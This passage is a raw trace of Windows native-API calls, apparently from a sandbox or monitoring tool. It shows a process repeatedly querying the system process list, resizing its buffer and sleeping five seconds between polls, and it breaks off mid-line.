NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.404] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.420] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.437] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.452] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.466] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.484] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.497] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.513] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.533] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.546] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.561] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.576] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.592] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.610] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.640] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.655] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.686] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.702] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.718] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 